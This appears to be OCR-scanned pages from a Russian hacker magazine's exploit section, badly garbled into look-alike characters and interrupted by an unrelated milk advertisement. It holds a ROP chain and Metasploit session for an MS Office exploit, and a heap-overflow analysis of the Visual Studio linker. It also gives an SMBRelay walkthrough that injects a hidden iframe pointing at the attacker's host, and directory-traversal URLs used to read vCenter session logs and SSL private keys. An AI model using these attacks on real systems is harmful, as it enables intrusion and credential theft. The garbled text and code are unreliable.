0х32 35Ь6Ь8. # РОР ЕВХ # КЕТМ [ыыИЬ.сІІІ] 

0x00 000001. # 0x00000001- > еЬх 

0х 31ас2Ьса. # РОР ЕРХ # КЕТМ [ымИЬ.сІІІ] 

0x00001000. # 0x00001000- > есіх 

0Х325950-Р З. # РОР ЕСХ # КЕТМ [ыыИЬ.сІІІ] 

0x000000 40. # 0x00000040- > есх 

0х31-Р Зса18. # РОР ЕРІ # КЕТЫ [ыыИЬ.сІІІ] 

0Х325 96С01. # КЕТМ (КОР NОР) [ыыИЬ.сІІІ] 

0х3 1е5сІ5а6. # РОР ЕАХ # КЕТМ [ыыИЬ.сІІІ] 

0x90909090. # пор 

0Х31-Р2-Р672. # РЦ5НАР # КЕТМ [ыыИЬ.сІІІ] 

# гор сРіаіп §епега1:есі ыііііі шопа.ру 

# по1:е: 1:ІіІ5 сРіаіп шаѵ по1: ыогк ои1: о-р 1:Ііе Ьох 

# ѵои шаѵ Ріаѵе 1:о сРіап^е огсіег ог Ріх зоше ^асІ^еІіБ. 

# Ьи1: 11: зРіоиІсІ §іѵе уои а Ііеа сІ 5І:аг1: 

] .РІаІІеп.раскГ'Ѵ*") 

геііигп гор_^асІ^е1:5 



Наконец-то мы добрались до заключительной части нашей эпопеи. 
НезабываемуказатьІагде^== 1, чтобы сгенерировать эксплойт для М5 
ОНісе2010: 

ГП5-Р > изе ехр1оі1:/ыіпсІоы5/Рі1е-Рогта1:/т5І2_027_т5Сотс1:1_ 
Ьо-Р_ыы1іЬ_гор 
ГП5-Р > Бе! 1:аг§е1: 1 

=> 1 

тз-Р ехр1оіѣ(т5І2_027_т5Сотсѣ1_Ьрі^_ш1іЬ_гор) > 

Бе! рауіоасі ыіпсІрыБ/ехес 
рауіоасі => ыіпсІоыБ/ехес 

ШБ-Р ехр1оі'Ь(т5І2_027_т5Сотс'1:1_Ьо-Р_ѵлл;1іЬ_гор) > 

Беі стсі саіс.ехе 

стсі => саіс.ехе 

Ш5-Р ехр1оі1:(т5І2 027 ШБСотсЫ Ьо-Р ѵдл/ІіЬ го р ) > ехрІоН 

[*] Сгеаіі пе *'гпБ-Р .сІос-* Рііе ... 

[+] ШБ-Р.сіос БІогесІ аі /Ііоте/ріко-РагасІ/.тБ-Р4/1оса1/тБ-Р.сІос 
гпБ-Р ехр1оі1:(тБІ2_027_тБСотс1:1_Ьо-Р_ыы1іЬ_гор) > 

Открываем на целевой системе сгенерированный тзЕсІос и наблюда- 
ем порядком поднадоевший калькулятор... 



ТАК0ЕТ5 



Місго5оПО?Исе2ОО35РЗ,2ОО75Р2/5РЗ,также2О1О0оІсІ/5Р1;ОНІсе2ООЗ 
\Л/еЬСотропепІ5 5РЗ;5аі5егѵег20005Р4,20055Р4и20085Р2/5РЗ/Р2; 
ВігТаІк5егѵег20025Р1;Сотппегсе5егѵег2002 5Р4, 2007 5Р2, также 2009 
СоІсІ/Р2;ѴІ5иаІРохРго8.05Р1и9.05Р2;ѴІ5иаІВа5Іс6.0. 



50ШТІ0М 



Существует обновление, устраняющее данную уязвимость. 
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МісгозоНІпсгетепІаІІіпкегІпІедегОѵегЛоѵѵ 



СѴ55Ѵ2 



ВА5Е5СОРЕ:7.2 



Лезем в папку с модулями для те1;а5рІоіСа. На основе файла 
т5І2_027_т5сотс^І_ЬоЕгЬ составим свой модуль и назовем его 
т5І2_027_т5сотс^І_Ьо^ѵѵ\л/ІіЬ_гор.гЬ. 



[ДЗШЗ 



(АѴ:Е/АС:Е/Аи:М/С:С/І:С/А:С) 



ѴѴаІіесІАББа г обнаружил уязвимость в МісгобоН ѴізиаІ Біисііо 2008, 
которая может быть использована злоумышленниками для ком- 
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Обзор эксплоитов 




ПрыжокнаначалопеределаннойРОР-цепочки,М50Місе2010 



прометации пользовательской системы. Уязвимость проявляется 
вследствие ошибки целочисленного переполнения в компоновщике 
(Ііпк.ехе) при выделении памяти, при этом размер выделяемой памяти 
зависит от количества символов СОРР. Этот факт можно использовать, 
чтобы добиться переполнения буфера в куче. Для успешной эксплуа- 
тацииуязвимоститребуется применить навыки социнженерии, ведь 
необходимо заставить пользователя определенным образом передать 
сформированный нами РЕ-файл на входутилитам битрЬіп.ехе или 
«Ііпк.ехе/сіиппр». 



ЕХРЮІТ 



Целочисленное переполнение происходит из-за того, что размер 
таблиц символов СОРР, внедряемых в исполняемый файл, рассчи- 
тывается небезопасным способом. Функция РеасІЗ^гіпдзАпсІЗуппЬоІз 
вызывается для осуществления парсинга таблицы символовСОРР 
всегда, если поля Роіп^егТоЗуппЬоІТаЫе и МитЬегО^ЗутЬоІз структуры 
1МА6Е_Р11Е_НЕА0ЕР содержат ненулевые значения. 

Іѵ ресіе-Р зіігис і _ІМАСЕ_РІІЕ_НЕАОЕК { 

ЫОКР Масбіпе: 

ІЛІОКО МитЬегО-Р5ес1;іоп5; 

РІЛІОКР ТітеРа1:е51:атр: 

РІЛІОКР Роіп1:егТо$утЬо1ТаЫе: 

РІЛІОКР МитЬегО-РБутЬоІз; 

ІЛІОКР 5І2е0-Р0р1:іопа1НеасІег; 

ІЛІОКР СІіагас1;егІ5І:іс5; 

} ІМАСЕ_РІІЕ_НЕАРЕК, *РІМАСЕ_РІІЕ_НЕАРЕК; 

Приведем псевдокод функции РеасІЗ^гіпдзАпсІЗуппЬоІз: 

ІПІ: Ііуре; 

ысбаг і:* асІііопМате: 

ІПІ: та§іс2: 

ѵоісі КеасІ$1:гі п^5АпсІ$ѵпіЬоІ5 (РЦМР5ТАТЕ* рРитр^ хх^ 

ысбаг і:* бІеМаше) { 

і-р (рРит р->Роіп1:егТо5утЬо1ТаЫе && рРитр->МитЬегО-Р5утЬоІ5){ 
асІііо пМапіе = І"КеасІ51:гіп§5АпсІ5утЬоІ5. ІоасІ51:гіп§5"; 

ІПІ: $утЕп 1:гѵ$І2е = (1;уре==2) ? 0x14 : 0x12; 

ІоасІ$1:гі п^5 ( рРишр . біепате^ 5утЕп1;гу5І2е); 

// ... 

асРіопМаше = І"КеасІ51;гіп§5АпсІ5утЬоІ5.КеасІ5утЬо1ТаЫе"; 
КеасI5утЬо1ТаЫеЕx(рРитр^ ...); 

} 

рРитр->51;гіп§5М5утЬоІ5 = 0; 

геііигп: 

} 




Прыжок на начало полезной нагрузки, М5 Обісе 2007 



В приведенном коде видно, как внутри функции РеасІЗ^гіпдзАпсІЗуппЬоІз 
происходитвызовфункций ЕоасІЗігіпдз и РеасІЗуппЬоІТаЫеЕх. Функция 
ЕоасІЗ^гіпдз подвержена ошибке целочисленного переполнения, проис- 
ходящей при вычислении конечного адреса табл и цы символов. Но этот 
адрес нам не интересен, поскольку используется только в последующих 
вызовах вплоть до функции РЬМарребРедіоп для того, чтобы удосто- 
вериться, что таблица символов не выходитза границы отмапленного 
входного файла. Функция РеасІЗуппЬоІТаЫеЕх вызывает функцию 
РеасІЗутЬоІТаЫеТ длятого, чтобы вычислитьабсолютный адрестаблицы 
символов в отмапл енном образе входного файл а. По возвращении из 
функции РеасІБуппЬоІТаЫеТ функция РеасІБуппЬоІТаЫеЕхнебезопасным 
образом вычисляетразмертаблицы символов: 

Кеас15утЬо1ТаЫеЕх( А^ МитЬегО-РЗутЬоІБ) { 



КеасІБѵтЬоІТаЫеТ ( . . . V. 

ип5І§песІ 1оп§ віі е = (NитЬегС>Р5утЬо15*4) + МитЬегОРЗушЬоІБ; 

5І2Ѳ += 5І2е: 

5І2Ѳ += 5І2е; 

ѴОІСІ *р = А11осВ1к(5І2еѴ. 

// ... 

Сопѵег1;К§Іт§5утТоК§Іт§5утЕх(МитЬегО-Р5утЬоІ5 ^ р) ; 



Затем вычисленноезначениеразмера передается в качествеаргу- 
мента функции АІІосВІк, которая, какследуетиз ее названия, выделяет 
память в куче путем вызова функции РбАІІосаІеНеар. Но есть один нюанс: 
если значение размера выделяемой памяти меньше или равно 0x400 
байт, то выделяется 0x400 байт. Например, если поле МитЬегО^ЗутЬоІз 
содержит значение ОхВООООООС, то запрашиваемый под память размер 
будетусечен до ОхШ и, соответственно, выделится 0x400 байт. 
Послетогокакпамятьбудетвыделена, вызывается функция 
Сопѵег^РдІтдЗуппТоРдІппдЗуппЕх. В качестве первого параметра высту- 
пает количество символов, второй параметр представляет собой адрес 
выделенной памяти. В недрахфункции Сопѵег^РдІтдВуппТоРдІппдВуппЕх 
находится цикл, осуществляющий копирование данных во вновь вы- 
деленную память. Вот, собственно, и приехали... Остальное, та к сказать, 
делотехники. 



ТАК6ЕТ5 



Місго5о^іѴІ5иаІ5ШсІіо2008, версия 9.00.21022.08, возможно, уязвимы 
идругиеверсии. 



50ШТІ0Н 



Не работайте с файлами из непроверенных источников. Можно и сокра- 
тить: не работайте! :) ^ 
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РЕАЛИЗАЦИЯ 
АТАКИ 5МВРЕ1АУ 
ВСЕТЯХ^ІМОО^З? 



ЗМВРеІау — это очень древняя 
МІТМ-атака, позволяющая получить 
несанкционированный доступ к удаленным 
ресурсам. О ней написано огромное 
количество материала, и чего, казалось 
бы, ворошить прошлое? Однако сегодня 
мы попробуем себя в роли некромантов, 
воскресим труп и посмотрим, какую пользу 
из этого можно получить. 



в наши дни 



^Т0 ТАКОЕ 5МВ? 

Прежде всего стоит напомнить, что пред- 
ставляет собой протокол 5МВ (Бегѵег Меззаде 
ВІоск). Тут все просто: когда ты пытаешься об- 
ратиться к файлам на удаленном компьютере, 
то чаще всего делаешь это с помощью 5МВ. Это 
протокол прикладного уровня для удаленного 
доступа к файлам, принтерам и другим сете- 
вым ресурсам, а также для межпроцессного 
взаимодействия. Однако разработанный еще 
в 1983 году протокол с самого начала имел 
изъяны, что привело к появлению целого 
класса атак, называемых ВМВРеІау. 



5МВРЕ1АУ НА ПАЛЬЦАХ 

Для тех, кто слабо знаком с уязвимостью 
5МВ, окунемся в историю и рассмотрим, в чем 
суть атаки ВМВРеІау и как она проводится на 
практике. 

Итак, аутентификация в протоколе 5МВ 
бывает двух видов: аутентификация на уровне 
пользователя и аутентификация на уровне 
шары (зЬаге-ІеѵеІ аиіЬепІісаІіоп). В первом слу- 
чае клиент отправляет серверу имя пользова- 
теля и пароль и, если они правильные, получает 
доступ к ресурсам в соответствии с правами его 
учетной записи. Во втором случае доступ к кон- 



кретному общему ресурсу контролируется толь- 
ко паролем, который подходит только для этой 
шары и не распространяется на другие ресурсы. 
В обеих схемах аутентификационные данные 
передаются в зашифрованном виде и для этого 
применяется хеш-алгоритм МТІМ (а в более 
ранних версиях обычный ІМ). Сервер отсылает 
клиенту случайно сгенерированный сЬаІІепде, 
клиент генерирует на его основе хеш от пароля 
и отсылает обратно серверу. Для упрощения 
жизни и избавления пользователя от регуляр- 
ных вводов паролей придумали такую штуку, 
как Іпіедгаіесі ѴѴіпбоѵѵз АиіЬепІісаІіоп (ІѴѴА). Суть 
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ЗМВРеІау в наши дни 




в том, что при попытке доступа к какому-нибудь 
сетевому ресурсу ѴѴіпсІоѵѵз первым делом пыта- 
ется аутентифицироваться, используя данные 
текущего пользователя, и, если в доступе 
отказано, только тогда просит ввести пароль 
вручную. Заставив жертву зайти на 5МВ-ресурс 
злоумышленника, атакующий может перена- 
править автоматически предоставленные 
аутентификационные данные на саму жертву, 
тем самым получить доступ к диску и через 
службу межпроцессного взаимодействия вы- 
полнить любой код. Теперь чуть подробнее. 

РЕАЛИЗАЦИЯ АТАКИ 

Во-первых, для успешного выполнения атаки 
злоумышленнику нужно притвориться служ- 
бой «Сервер», которая ныне работает на 445-м 
ТСР-порту (а раньше работала через МеіВіоз 
и обрабатывала запросы через порт 139). 

Здесь можно либо отключить службу «Сервер» 
и встать на ее место, либо создать отдельный 
ІР-адрес и прибиндиться к нему. 

Следующий шаг злоумышленника — за- 
ставить жертву зайти на его сервис (как это 
возможно, рассмотрим позже). Распишем по- 
шагово все, что происходит: 

1. Жертва присоединяется кзлоумышленнику 
и пытается инициироватьЗМВ-сессию. 

2. Злоумышл енник параллельно присоединяет- 
ся кжертве и говорит, чтохочеттогоже самого. 

3. Жертва спрашивает, каким способомтребу- 
ется осуществитьаутентификацию. 

4. Злоумышленник спрашивает у жертвы. 



каким способом стоитосуществитьаутенти- 
фикацию. Получает ответи сЬаІІепде. 

5. Далее он отвечает жертве и передает ей тот 
же самый сЬаІІепде, который она сгенерила 
в параллельной сессии сама. 

6 . Жертва отсылаетзлоумышленнику гезропзе 
в виде хеша, который злоумышленник снова 
Пересы л аетжертве в параллельном соеди- 
нении. 

7. Жертва отключается, при этом злоумышлен- 
ник выполнил авторизацию на ней самой, 
используя ею же предоставленные данные. 

Воттаким нехитрым способом без знания 
пароля кто угодно может получить доступ. Что 
с ним делать дальше — уже дело конкретной 
задачи и реализации. 

ИНСТРУМЕНТЫ РЕАЛИЗАЦИИ 

Первый эксплойт, реализующий атаку 
ЗМВРеІау, появился весной 2001 года. Его 
автором был 5іг Оузііс из культовой команды 
СиК ОІ^ТЬе ОеасІ Соѵѵ. Разработанный им код 
перенаправлял авторизацию жертвы на саму 
себя и вел прослушку только с ІР-адресов. Им 
же была написана утилита 5тЬге1ау2, которая 
уже могла перенаправлять авторизацию на тре- 
тий хост и работать с МеіВіоз-именами. Можно 
было не только получить доступ к ресурсам уда- 
ленного компьютера, но и сохранить во время 
атаки используемый МТЕМ сЬаІІепде+гезропзе 
и восстановить пароль методом грубого пере- 
бора (например, при помощи Саіп & АЬеІ). 



Столь серьезная уязвимость в первоздан- 
ном виде просуществовала до конца 2008 
года — ровно до тех пор, пока не появился 
вменяемо работающий эксплойт. Выпущенный 
МІСГ050Й патч запретил принимать входящее 
соединение с тем же челенджем, который уже 
используется при исходящем подключении. То 
есть релеингжертвы самой на себя (как мы по- 
шагово расписали выше) был прикрыт. Однако 
никакой патч не запретит нам перенаправить 
авторизацию на некий третий ресурс, к кото- 
рому у атакуемой жертвы имеется доступ! 

В 2008 году появился зтЬгеІауЗ от Тагазсо 
Зесигііу, в котором присутствовал набор 
расширенных методов эксплуатации данной 
уязвимости. 

Кроме классической схемы 5МВ -> 5МВ, до- 
бавились способы перенаправления аутен- 
тификации с таких сервисов, как НТТР/ІМАР/ 
Р0РЗ/5МТР. Все они поддерживают автори- 
зацию через МТЕМ. Авторы пошли несколько 
дальше: после получения доступа к жертве 
зтЬгеІауЗ устанавливает и запускает бэкдор, 
который биндит стсі.ехе, таким образом 
давая возможность не просто читать/писать, 
но и выполнять любые команды. На непат- 
ченной ѴѴіпсІоѵѵз ХР 5РЗ удалось без проблем 
запустить стсі.ехе даже при перенаправлении 
жертвы на саму себя (фикс М508-068 вышел 
позже). Перенаправление авторизации с ХР на 
ѴѴіпсІоѵѵз 2003 также прошло успешно (при на- 
личии соответствующего доступа). Но ѴѴіпсІоѵѵз 
ХР — это уже часть прошлого, меня же в моем 



КРОССПЛАТФОРМЕННОСТЬ ЧТО НУЖНО для МІТМ? 



Помимо основной версии, Іпіегсеріег существует 
и в мультиплатформенном консольном варианте! Причем 
поддерживаются не только десктопные ОС (ѴѴіпсІоѵѵз, Еіпих, В50), 
но и мобильные АпсІгоісІ и І05. На текущий момент далеко не весь 
функционал перекочевал из оригинальной ѴѴіпсІоѵѵз-версии, но все 
самое необходимое присутствует: это грабинг паролей, воскрешение 
файлов, а также сканирование сети и АРР Роізоп. 

Іпіегсеріег Сопзоіе Есііііоп работает в двух режимах: обычном текстовом 
режиме и консольном ЗШ-режиме на базе библиотеки Мсигзез. Сейчас 
активно ведется работа по улучшению и оптимизации. 



Для проведения любой МІТМ-атаки (к коим относится и ЗМВРеІау) 
в 1п1егсер1ег-М6 нужно сделать несколько базовых действий. В первую 
очередь необходимо добавить жертву в список клиентов. Можно 
воспользоваться функцией сканирования локальной сети, а можно 
руками вбить нужные ІР-адреса. Затем важно указать ІР-адрес шлюза 
в сети, через который осуществляется доступ в интернет. Последнее 
действие — указание Б^еаИИ ІР-адреса, который будет использоваться 
для скрытой маршрутизации трафика. Таким ІР-адресом может быть 
любой свободный ІР из той же подсети, с которого доступен интернет (то 
есть он не отфильтрован на файрволе). 
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исследовании интересовала эксплуатация 
ЗМВРеІау в современных сетях, где в качестве 
клиентских ОС используется ѴѴіпсІоѵѵз 7. 

5МВРЕГАУѴ5ѴѴІМР0ѴѴ5^ 

Первой проблемой реализации атаки стало 
то, что в ѴѴіпсІоѵѵз 7 параметр «САМ Мападег 
аиіЬепІісаІіоп ІеѵеІ» по умолчанию установлен 
в «5епс1 МТІМѵ2 гезропзе опіу». То есть вместо 
обычного алгоритма МТІМ при генерации 
гезропзе клиент будет использовать более 
новый и улучшенный алгоритм МТІМѵ2 (это 
сделано для повышения криптостойкости 
передаваемых хешей). И так вышло, что все 
реализации ЗМВРеІау (включая зтЬгеІауЗ 
и соответствующий модуль в Меіазріоіі) не 
поддерживают релеинг МТІМѵ2-авторизации. 
Очевидно, раньше в этом не было необходимо- 
сти, а позже никто не удосужился добавить эту 
поддержку. После внесения необходимых из- 
менений в исходный код зтЬгеІауЗ МТІМѵ2 был 
успешно зарелеен с ѴѴіпсІоѵѵз 7 на ѴѴіпсІоѵѵз ХР. 

Но вылез следующий нюанс. В ѴѴіпсІоѵѵз 7, 
с его обновленным ІЕ, поменялось значение 
понятия ІпІгапеС Раньше было все просто: 
если в рабочей группе сетевое имя вида 
«зоте_Ьоз1» резольвится в ІР-адрес локаль- 
ного сегмента, то, стало быть, тот находит- 
ся в Іпігапеі и с ним можно автоматически 
провести авторизацию, используя данные 
активной сессии. В свойствах ІЕ семерки 
имеется установленная по умолчанию опция 
«Аиіотаіісаіу беіесі іпігапеі пеіѵѵогк»: в таком 
режиме привычная рабочая группа к внутрен- 
ней доверенной сети больше не относится 
и является недоверенной зоной, а поэтому 
никакой автоматической авторизации не 
произойдет. Зато, находясь в домене, ѴѴіпсІоѵѵз 
7 с радостью предоставит все нужные данные 
любому компьютеру из локальной сети. Таким 
образом, при включенной опции обнаружения 
Іпігапеі ѴѴіп7 в рабочей группе не подвержена 
атаке ЗМВРеІау, но станет уязвимой в домене. 



Многие могут представить ситуацию, что 
в домене, благодаря перенаправлению данных 
на третий хост, возможно, к примеру, захватить 
контроллер домена после атаки на компьютер 
администратора. Увы, по крайней мере с кон- 
фигурацией контроллера по умолчанию это не- 
возможно. Существует очень простое средство 
блокирования атак ЗМВРеІау — механизм 5МВ 
Зідпіпд, после активации которого контроллер 
домена начинает требовать от клиентов обяза- 
тельно использовать подпись пакетов. В этом 
случае перенаправленная на сам контроллер 
сессия будет отклонена, так как подделать 
подпись, не зная пароля, невозможно. Однако 
в некоторых случаях 5МВ Зідпіпд отключает- 
ся администратором намеренно, поскольку 
принудительное шифрование требует больше 
ресурсов и снижает пропускную способность. 
Обязательным условием для успешной атаки 
является наличие доступа к административ- 
ным ресурсам 1РС$ и А0М1М$: без них не будет 
возможности удаленно выполнить код, хотя 
возможность «шариться» по другим ресурсам 
(С$...) сохраняется. Эти нововведения необхо- 
димо было учитывать для атаки ЗМВРеІау. 

НОВАЯ РЕАЛИЗАЦИЯ 5МВРЕ1АУ 

Результатом исследования стала реализа- 
ция стабильного модуля ЗМВРеІау в составе 
инструмента 1п1егсер1ег-М6, который работает 
на современных ОС с использованием МТЕМѵ2 
(назовем его зтЬге1ау4). Чтобы избежать 
трудностей, связанных с работающей на 445-м 
порту службой «Сервер», атака проводится 
по направлению НТТР -> 5МВ. То есть при 
входящем соединении браузеру предлагается 
МТЕМ-авторизация, которая в дальнейшем 
будет перенаправлена или на тотже самый 
хост, или на какой-то другой. Самым сложным 
при проведении атаки всегда было заманить 
жертву на нужный ресурс: в основном это 
делалось либо отсылкой электронного письма, 
либо выкладыванием файла со злонамеренной 



ссылкой на общий ресурс, реже за счет ис- 
пользования еиегсар и подмены веб-трафика. 

Я остановился на последнем варианте, как 
наиболее быстром и эффективном. 

Как это выглядит? Выбирается цель, затем 
проводится Агр Роізоп и в веб-трафик жертвы 
инжектится ссылка, при запросе которой 
осуществляется ЗМВРеІау-атака. Весь процесс 
автоматизирован, и никакого вмешательства 
не требуется. Для стабильного и тихого инжек- 
та заменяются «ненужные» участки НТМЕ- 
кода, такие как: 

<!РОСТУРЕ. . .> 

<те1:а пате="кеуыогсІ5" . . . > 

<те1:а пате="сІе5сгір1:іоп" . . . >. 

При заходе на сайт один из «ненужных» 
участков кода будет заменен на код вида: 

<і-Ргате 5гс=Іі1;1;р : //ір_адрес_атакующего : 
порт_на_котором_запущен_5гпЬге1ау 
ыісІ1:Іі="0" Ііеі§ІтІ;="0"></і-Ргате> 

Правда, надо иметь в виду, что автоматиче- 
скую авторизацию через МТЕМ по умолчанию 
поддерживают только ІЕ/СЬготе, а РігеІ'ох (и, 
возможно, Орега) требуют ручной настройки 
для включения этой функции. 

РЕЗЮМЕ 

Наш мертвец оказался очень даже живым 
и при умелом использовании способен нало- 
мать немало дров. Главное — помнить важное 
правило, что основной инструмент хакера — 
это мозг, без которого никакой эксплойт или 
«крякер интернета» просто не будет рабо- 
тать. В качестве мер защиты от ЗМВРеІау на 
клиентских компьютерах следует обязательно 
включить 5МВ Зідпіпд через соответствую- 
щие ключи реестра «ЕпаЫеЗесигіІуЗідпаІиге, 
РедиігеЗесигіІуЗідпаІиге». Это сильно услож- 
нит жизнь злоумышленнику. 





ИММР-СПУФИНГ 


ПЕРЕХВАТ ФАЙЛОВ 


Новые версии ѴѴіпсІоѵѵз несут в себе новые возможности и сюрпризы. Еще в Ѵізіа 
появилась такая штука, как ЕЕММР (Ііпк ІосаІ Миііісазі Мате Резоіиііоп). Протокол 
основан на формате пакетов 0М5 и служит для разрешения имен в локальной сети. 
Целесообразность данного нововведения сомнительна, а вот для безопасности это 
очередная брешь. По сути, это гибрид 0М5 и МВМ5 (МеіВІОЗ Мате Зегѵісе). В случае 
когда пользователь вводит в адресной строке имя компьютера вида «зоте_пате», 
система пытается разрешить данное имя при помощи ЕЕММР. Если ответа не получено, 
то при помощи 0М5. А если и здесь ничего не найдено, то при помощи старого доброго 
МВМ5. Запрос ІЕММР, естественно, широковещательный, поэтому в локальной сети 
можно устроить классический спуфинг, точно такой же, как и с МВМ5. Особенно 
эффективно можно использовать ІІММК-спуфинг в ситуации, когда жертва на 
современной винде (ѴізІа/7/ѴѴ2к8) обращается к старым версиям (2к/ХР/2кЗ), которые 
знать не знают, что такое ІЕММР. Так как настоящая система ответ не пошлет, то ничто 
не помешаетзлоумышленнику ответить за нее и оказаться посередине. Стоит лишь 
отметить, что ЕЕММР используется только при условии, что включена опция «Меіѵѵогк 
Оізсоѵегу» в дополнительных параметрах общего доступа. 


Уважаемый автор 1п1егсер1ег-М6 
включил в состав инструмента 
уматную штуку, а именно Резиггесііоп 
Мосіе, то есть режим «воскрешения». 
Воскрешает он файлы из сетевого 
трафика. Теперь не только пароли 
и переписка извлекаются из 
перехваченного трафика, но и все 
файлы, которые передаются по 
протоколам НТТР/РТР/5МВ/ІМАР/ 
Р0РЗ/5МТР, будут сграблены на диск 
и доступны для просмотра. Можно 
в реальном времени наблюдать, 
какие фотки из «ВКонтакте» 
просматривают девчонки за соседним 
столиком в кафе. 



УШИ 

- ЬИ.Іѵ/36срУ 4 — 
официальный веб- 
сайт инструмента; 
• ЫШ/ІѴѴУ625 — 
видеотуториал по 
Іпіегсеріег. 



ШКЫІМС 



Вся информация 
представлена 
исключительно 
в ознакомительных 
целях. Любое ее 
использование 
в противозаконных 
целях может 
повлечь за собой 
преследования 
компетентных 
органов. Мы 
рассказываем тебе 
об уязвимостях 
в современных 
системах, но ни 
в коем случае не 
призываем к их 
эксплуатации. 
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ІШріродуішія «ТЕВЬЕ Мй^рмНИК' произведена из целі 

(неѳосстановлѳнногсіѴыолока очень высокого качества- 
* Такой строгий контроль оказывается важным и для людей, 
заботящихся о здоровье- посколшу в после^іее время на рынке появилось. 

елок и разбавлений как молока, так и продуктов 



взлом 



Алексей Синцов, Оідііаі Зесигііу (іѵѵіиег.сот/аБІпіБоѵ) 








ПРОБИВАЕМ 

ѴМѵѵ;ш% ѵСепіег 



КЛАССИЧЕСКИЕ 
УЯЗВИМОСТИ 
В СИСТЕМАХ 
ВИРТУАЛИЗАЦИИ 




Безопасность виртуальных систем сейчас мод- 
ный тренд, и мы не станем обходить его сторо- 
ной. Ниже мы попробуем сломать самое сердце 
инфраструктуры ѴМѵѵаге — сервер с установ- 
ленным ѵСепІег. Пользоваться при этом мы 
будем только олдскульными методами, никак 
не связанными с виртуальными технологиями. 



^^МѴѴАРЕѴСЕМТЕР 

Многие корпоративные системы живут в виртуальных средах. Это 
дешевле и удобнее. И круче! Лидером в области обеспечения этих 
самых сред является небезызвестная компания ѴМѵѵаге. Собственно, 
эти ребята имеют крутой гипервизор и, что также немаловажно, кучу 
всякого ПО для удобного развертывания, управления и контроля. Все 
это делает решения от ѴМѵѵаге гибкими, масштабируемыми и в конеч- 
ном счете эффективными. Для удобного администрирования ребята 
разработали серверное ПО, в котором консолидируется вся админи- 
стративная часть инфраструктуры, — ѴМѵѵаге ѵСепІег. То есть имеется 
у вас, к примеру, 10 железных машин с ѴМѵѵаге Е5Х(і). На них в общей 
сложности у вас бегает 50 виртуальных машин. Админить этот вир- 
туальный зоопарк было бы неудобно, если бы не было центральной 
системы управления ѵСепІег. Помимо прочего, благодаря ѵСепІег 
возможны разного рода хитрости, вроде прозрачной миграции 
виртуальных образов в случае отказа одного из Е5Х работать. Короче, 
мегаудобная и важная штука. На этом реклама закончена. Основная 
суть: если хакер взломает ѵСепІег — вся сеть в его руках. 

ПРОРЫВАЕМ ОБОРОНУ 

Известный исследователь Клаудио Крисконе не раз сталкивался 
с «Центром», а потому знает, как его ломать. Вот и я на одном из 
пентестов столкнулся с этим самым ПО и решил воспользоваться му- 
дростью Клаудио, чтобы запывнитьтам все. Идея Клаудио была про- 
ста: наш друг нашел уязвимость в менеджере обновлений ѵСепІег'а. 
Уязвимость была даже не по вине программистов ѴМѵѵаге. Дело в том, 
что веб-интерфейс этого менеджера (висит на ТСР-порту 9084) ис- 
пользует в качестве веб-сервера Эеиу и уязвимость нашлась именно 
там. Уязвимость классическая — выход за границы каталога: 

Іі1;1;р : //1:аг§е1: : 9084/ѵсі/сІоып1оасІ/Ііеа11:Іі . хт1/%3-Р/ 



. ./РІІЕ.ЕХТ 

Все просто: читаем любые файлы, на которые у учетной записи 
хватает прав. Но Клаудио задался вопросом: какой же файл читать? 

В общем, покопался он в файловой системе и нашел чудесный файл 
журналирования доступа, в котором хранился код сессии (см. скрин). 

Что представляет собой этот код? Дело в том, что ѵВрЬеге-клиент 
работает с ѵСепІег по протоколу 50АР, то есть манипулирует обычным 
НТТРВ-трафиком, в теле которого ХМЕ-структура с данными, коман- 
дами и так далее. При этом после аутентификации администратора 
ему прописывается код 50АР-сессии, и впоследствии этот код прове- 
ряется как соокіе с РНР5Е55І0МЮ, типа аналог :). Очевидно, что, по- 
хитив этот код, мы можем подсунуть его в свой 50АР-запрос и ѵСепІег 
будет думать, что мы уже аутентифицировались как какой-то там 
админ (если сессия еще жива). То есть Клаудио предлагает через 
уязвимость в Эеиу-веб-сервере прочитать лог с этими 50АР-кодами. 

Іі1;1;р : //1:аг§е1: : 9084/ѵсі/сІоып1оасІ/Ііеа11;Іі . хт1/%3-Р/ 

. ./Рпо§гатОа1:а\ѴМыаге\ѴМыаге Ѵіг1;иа1Сеп1;ег\Іо§5\ѵрхсІ- 
ргоб1ег-6. 1о^ 

Затем подставлять коды в запросы от ѵВрЬеге. Для этого он даже 
разработал свой прокси-сервер, который на лету подменяет код 
сессии в пакетах от ѵВрЬеге, и включил этот прокси в состав своего 
абсі-оп'а к МеІазрІоіТу — ѴА5Т0. Данный модуль был выпущен в 2010 
году и презентован на конференции ВІаск Наі 2010. Несмотря на то 
что тулза аж двухлетней давности, некоторые ее модули актуальны и 
работоспособны и сейчас (не говоря уже о том, что далеко не всегда 
администраторы обновляют свои виртуальные среды, поэтому вполне 
можно встреть старый ѵСепІег, на котором баги еще не закрыты). 

Таким вот образом наш итальянский друг из компании Соодіе 
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Пробиваем ѴМѵѵаге ѵСепІег 



предлагает наказывать ѵСепІег. Но беда в том, что все эти уязвимости 
к моменту моего пентеста устарели, на тот момент (весна - лето 2011) 
нам пришлось иметь дело с последней версией ПО, а это значит, что и 
Оеиу был патченным-перепатченным. 

ВОДНУИТУЖЕВОРОНКУІ , 

СНАРЯДДВАЖДЬГНЕ ПОПАДАЕТ?! 

Весьма разочарованный (халявы не получилось), я стал думать, что 
делать. Вообще, любой пентестер в такой ситуации просто пройдет 
мимо и напишет в отчете, что на данном ресурсе уязвимостей нет. Но, 
как обычно, почувствовав возмущения в Силе, я не доверился всем 
этим патчам. Что-то заставило меня продолжить издеваться над ^еиу, 
комбинируя варианты эксплойта для выхода за пределы каталога. 

И через 1 5 минут я получил результат. Уже в другом месте того же 
менеджера обновления опять была уязвимость: 

Іі1;1;р : //1;аг§е1: : 9084/ѵсі/сІоыпІоасІ/ 

РІІЕ.ЕХТ 



Это уже что-то, ведь опять можно идти читать файл с 50АР-кодами! 

Но опять нас ждало разочарование — коды сессий больше в этом 
чудесном файле не содержатся. Можно только отметить отличную 
работу программистов из ѴМѵѵаге, которые подмели логи и сделали 
нам бяку. Что ж, поищем сами, что еще в файловой системе может 
нам пригодиться... Самое первое, что приходит в голову, — это найти 
и спереть секретный ключ для 551. С ним мы смогли бы перехваты- 
вать 551-трафик и расшифровывать его (ѵѵЫгезЬагк позволяет делать 
это без проблем). Сам ключ можно найти так: 

Ітіііір : //1:аг^е1: : 9084/ѵсі/сІоып1оасІ5/ Л. Л. Л. Л. Л. Л. Л. Л 
РосишепІіБ апсі 5е1:1:іп^5\А11 ІІ5ег5\Арр1іса1:іоп Ра1:а\ѴМыаге\ 
